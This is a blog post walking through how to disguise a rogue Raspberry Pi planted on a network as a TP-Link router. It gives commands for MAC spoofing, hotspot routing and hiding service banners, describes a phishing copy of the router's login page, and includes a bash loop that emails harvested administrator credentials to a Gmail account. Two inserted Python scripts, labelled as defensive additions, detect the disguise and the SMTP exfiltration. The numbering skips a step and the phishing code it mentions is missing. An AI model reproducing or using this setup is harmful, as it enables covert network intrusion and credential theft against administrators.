March 10, 2019
Masking raspberry pi to look like and act like a router
This post continues the story of infiltrating a local network on-site with a Raspberry Pi (link).
When you infiltrate a serious network, one with a good security team and system administrators who do their job properly, it is only a matter of time until they detect your hacking gadget. Picture the system admin performing a regular scan of the network and finding a new device: a Raspberry Pi. We can all imagine the expression on his face. So it is very smart to mask the Pi to look like something else, such as a printer, a router or a Windows PC. This will definitely attract less attention.
In this post I will focus on how to mask a Raspberry Pi so that it looks like and acts like a router. In my case it will look like a TP-Link router. I will also create a phishing page imitating the router settings page, with the purpose of catching the admin's credentials in case he finds me and tries to log in. Finally, I will set things up so that harvested credentials are sent to my email.
For the purpose of this post I used a Raspberry Pi Zero W with two USB wifi antennas attached.
Here are the steps we will focus on:
MAC spoofing of both antennas
Creating a wifi hotspot (password protected and unprotected)
Hiding the Debian version in the SSH banner
Changing the service name on port 80
Creating a phishing page (router settings page)
Setting up email to receive harvested credentials
1. MAC spoof
Change the MAC address of both antennas to a TP-Link Technologies address. Type the following commands:
ifconfig wlan1 down
macchanger -m f8:d1:11:2a:24:a3 wlan1
ifconfig wlan1 up
ifconfig wlan2 down
macchanger -m f8:d1:11:2a:24:a4 wlan2
ifconfig wlan2 up
service network-manager restart
Note: after a reboot the original MAC addresses are restored, so the best way to keep the spoofed MAC addresses is to create a script that runs after each boot.
2. Creating wifi hotspot
You can create a password protected or an unprotected wifi hotspot. For the unprotected one I found a great tool on GitHub which is really easy to set up, while creating a password protected one is a little more time consuming.
2.1. Password unprotected wifi hotspot
git clone https://github.com/oblique/create_ap
cd create_ap
make install
systemctl start create_ap
create_ap wlan2 wlan1 MyAccessPoint
2.2. Password protected wifi hotspot
Download and install hostapd and dnsmasq.
sudo apt-get install hostapd
sudo apt-get install dnsmasq
service hostapd stop
service dnsmasq stop
Define the hotspot interface and IP ranges in /etc/dnsmasq.conf.
Now your hotspot is created, but it still does not provide internet access. Next you need to configure routing between the two wifi adapters. In my case wlan1 is connected to the internet, while wlan2 is used for the wifi hotspot.
Uncomment the IPv4 packet forwarding line in /etc/sysctl.conf.
Run the following command to activate forwarding immediately:
sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
Turn the raspberry pi into the router:
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o wlan2mon -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan2mon -o wlan1 -j ACCEPT
After that, save the rules to /etc/iptables.ipv4.nat:
sh -c "iptables-save > /etc/iptables.ipv4.nat"
The following line is supposed to restore the rules whenever the Raspberry Pi boots. In my case they were not restored, because the restore ran at boot before wlan2 was put into monitor mode (wlan2mon), so that interface did not exist yet. It may work in other circumstances, for example if you get the hotspot running without monitor mode. Either way, here is the line to add to /etc/network/interfaces:
pre-up iptables-restore < /etc/iptables.ipv4.nat
Finally, you need a bash script that starts your hotspot. In my case I created hotspot.sh:
#!/bin/bash
ifconfig wlan2mon 192.168.2.1
service dnsmasq restart
hostapd /etc/hostapd.conf
3. Changing the service names on ports 22 and 80
For port 22 you should hide the Debian version in the SSH banner, so that the association between a "router" and a Debian distribution does not look suspicious. To do this, add the following line to /etc/ssh/sshd_config.
Next, change the Apache2 service name. Why? When you scan a router it is not common to see an Apache service running on port 80. So in my case I changed it to TP-LINK WR841N WAP http config.
In this code you can see that after login it redirects you to the /error folder. In that folder you can create a new index.html file which renders something like "you have no authority to access this router". All harvested credentials are saved in the pass.txt file.
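From the defender's side, the three disguises above (vendor OUI on the MAC, a trimmed SSH banner, a router-like HTTP Server header) are independent claims about one device, and a scanner that records all of them can cross-check them. The following script is an added example for this post, not the author's code: it walks a list of constructed scan records and flags a device whose TP-Link OUI is contradicted by a Debian SSH banner or an Apache Server header, plus any device missing from the asset inventory. The OUI table is a hypothetical two-entry subset (the f8:d1:11 prefix is the one the post uses), and the IPs, MACs and banners are constructed.

```python
"""Cross-check scan records for devices whose identity claims disagree.

Added defensive example; not code from the original post. Records, MACs,
banners and the OUI table are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List

# Hypothetical OUI subset; a real deployment loads the full IEEE registry.
OUI_VENDORS = {
    "f8:d1:11": "TP-Link",                   # prefix used in the post
    "b8:27:eb": "Raspberry Pi Foundation",
}

# Vendors whose products are embedded network gear. On such devices a
# desktop/server distro in the SSH banner, or Apache/nginx on port 80,
# is unexpected and worth a closer look.
EMBEDDED_VENDORS = {"TP-Link"}
GENERAL_PURPOSE_SSH = ("debian", "ubuntu", "raspbian")
GENERAL_PURPOSE_HTTP = ("apache", "nginx")


@dataclass
class ScanRecord:
    ip: str
    mac: str
    ssh_banner: str = ""       # e.g. "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"
    http_server: str = ""      # Server header returned on port 80
    in_inventory: bool = True  # known to the asset inventory


def vendor_of(mac: str) -> str:
    """Map the first three octets of a MAC to a vendor name."""
    return OUI_VENDORS.get(mac.lower()[:8], "unknown")


def check_record(rec: ScanRecord) -> List[str]:
    """Return human-readable findings for one scanned host (empty if clean)."""
    findings: List[str] = []
    vendor = vendor_of(rec.mac)
    if not rec.in_inventory:
        findings.append("new device not in inventory")
    if vendor.startswith("Raspberry Pi"):
        findings.append("Raspberry Pi OUI")
    if vendor in EMBEDDED_VENDORS:
        banner = rec.ssh_banner.lower()
        if any(d in banner for d in GENERAL_PURPOSE_SSH):
            findings.append(
                f"{vendor} OUI but SSH banner names a general-purpose distro: "
                f"{rec.ssh_banner}"
            )
        server = rec.http_server.lower()
        if any(s in server for s in GENERAL_PURPOSE_HTTP):
            findings.append(
                f"{vendor} OUI but HTTP Server header is {rec.http_server}"
            )
    return findings


def audit(records: List[ScanRecord]) -> Dict[str, List[str]]:
    """Audit every record; keyed by IP for easy reporting."""
    return {r.ip: check_record(r) for r in records}


# Constructed sample: an undisguised Pi, a partly disguised Pi, a Pi with
# the banners from the post applied, and a genuine inventoried router.
SAMPLE_RECORDS = [
    ScanRecord("10.0.0.22", "b8:27:eb:12:34:56",
               "SSH-2.0-OpenSSH_7.9p1 Raspbian-10", "", False),
    ScanRecord("10.0.0.23", "f8:d1:11:2a:24:a3",
               "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2",
               "Apache/2.4.38 (Debian)", False),
    ScanRecord("10.0.0.24", "f8:d1:11:2a:24:a4",
               "SSH-2.0-OpenSSH_7.9p1", "TP-LINK WR841N WAP http config", False),
    ScanRecord("10.0.0.1", "f8:d1:11:00:00:01",
               "", "TP-LINK WR841N WAP http config", True),
]

if __name__ == "__main__":
    for ip, findings in audit(SAMPLE_RECORDS).items():
        print(ip, findings or "ok")
```

The third record shows the limit of banner-based checks: once the SSH version string and Server header are changed as the post describes, only the inventory comparison still fires, which is why a maintained inventory of known MAC addresses and switch ports is the durable signal here.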
5. Setting email to receive harvested credentials
To receive harvested credentials by email (to a Gmail account) you can use ssmtp.
apt-get install ssmtp
Then add the following lines to the configuration file /etc/ssmtp/ssmtp.conf, changing the AuthUser and AuthPass lines.
Note: in the Gmail account settings you need to allow less secure apps to access your account.
Now you need to create a script, and make it run at boot, which checks every 20 seconds whether pass.txt exists; if it does, it greps the username and password from it and sends them to your Gmail account.
#!/usr/bin/bash
while sleep 20
do
  if [ -f /var/www/html/pass.txt ]
  then
    grep -e user -e pass /var/www/html/pass.txt | ssmtp firstname.lastname@example.org
    rm -f /var/www/html/pass.txt
  fi
done
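The loop above produces a distinctive network pattern that a defender can watch for: a device that is supposed to be a router accepts an HTTP request on its management page and, seconds later, opens an outbound SMTP connection. The script below is an added defensive example, not the post's code. It reads firewall log lines in a simplified iptables LOG style (the lines, IPs and the infrastructure list are constructed), raises an alert whenever a listed infrastructure device connects to an SMTP port, and escalates the alert when that connection follows an inbound HTTP request to the same device within a short window. The window length and the set of SMTP ports are assumptions to tune per site.

```python
"""Flag outbound SMTP from a 'router' shortly after someone visits its web UI.

Added defensive example; not code from the original post. Log lines are
constructed in a simplified iptables LOG style; 10.0.0.23 plays the
disguised Pi and 10.0.0.5 the administrator's workstation.
"""
import re
from datetime import datetime
from typing import Dict, List, Optional

SAMPLE_LOG = """\
2019-03-10T14:02:11 IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.23 PROTO=TCP SPT=51234 DPT=80
2019-03-10T14:02:31 IN=eth0 OUT=eth1 SRC=10.0.0.23 DST=203.0.113.10 PROTO=TCP SPT=40021 DPT=587
2019-03-10T14:10:00 IN=eth0 OUT=eth1 SRC=10.0.0.40 DST=203.0.113.10 PROTO=TCP SPT=40022 DPT=587
2019-03-10T15:00:00 IN=eth0 OUT=eth1 SRC=10.0.0.23 DST=203.0.113.10 PROTO=TCP SPT=40023 DPT=465
"""

# Hypothetical: addresses the inventory lists as routers, switches, printers.
INFRA_DEVICES = {"10.0.0.23"}
SMTP_PORTS = {25, 465, 587}
MGMT_PORTS = {80, 443}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+) "
    r"PROTO=(?P<proto>\S+) SPT=\d+ DPT=(?P<dpt>\d+)"
)


def parse_line(line: str) -> Optional[Dict]:
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "src": m["src"],
        "dst": m["dst"],
        "proto": m["proto"],
        "dpt": int(m["dpt"]),
    }


def detect_exfil(log_text: str, infra=INFRA_DEVICES, window_seconds: int = 60) -> List[Dict]:
    """Return alerts for SMTP connections originating from infrastructure devices.

    Severity is 'high' when the SMTP connection follows an inbound HTTP(S)
    request to the same device within window_seconds, 'medium' otherwise.
    """
    last_mgmt_hit: Dict[str, datetime] = {}
    alerts: List[Dict] = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        # Remember when each infrastructure device last received a web request.
        if ev["dst"] in infra and ev["dpt"] in MGMT_PORTS:
            last_mgmt_hit[ev["dst"]] = ev["ts"]
            continue
        # Routers and printers have no business talking SMTP.
        if ev["src"] in infra and ev["dpt"] in SMTP_PORTS:
            prev = last_mgmt_hit.get(ev["src"])
            delta = (ev["ts"] - prev).total_seconds() if prev else None
            if delta is not None and 0 <= delta <= window_seconds:
                severity, secs = "high", int(delta)
            else:
                severity, secs = "medium", None
            alerts.append({
                "device": ev["src"],
                "dst": ev["dst"],
                "dport": ev["dpt"],
                "severity": severity,
                "seconds_after_http": secs,
            })
    return alerts


if __name__ == "__main__":
    for a in detect_exfil(SAMPLE_LOG):
        print(a)
```

On the sample log the first SMTP connection from 10.0.0.23 lands 20 seconds after the admin's request to port 80 and is reported as high severity; the later one at 15:00 has no recent web request and is reported as medium, while the workstation's own mail traffic (10.0.0.40) is ignored. Egress filtering that blocks SMTP from the infrastructure VLAN would turn this detection into prevention.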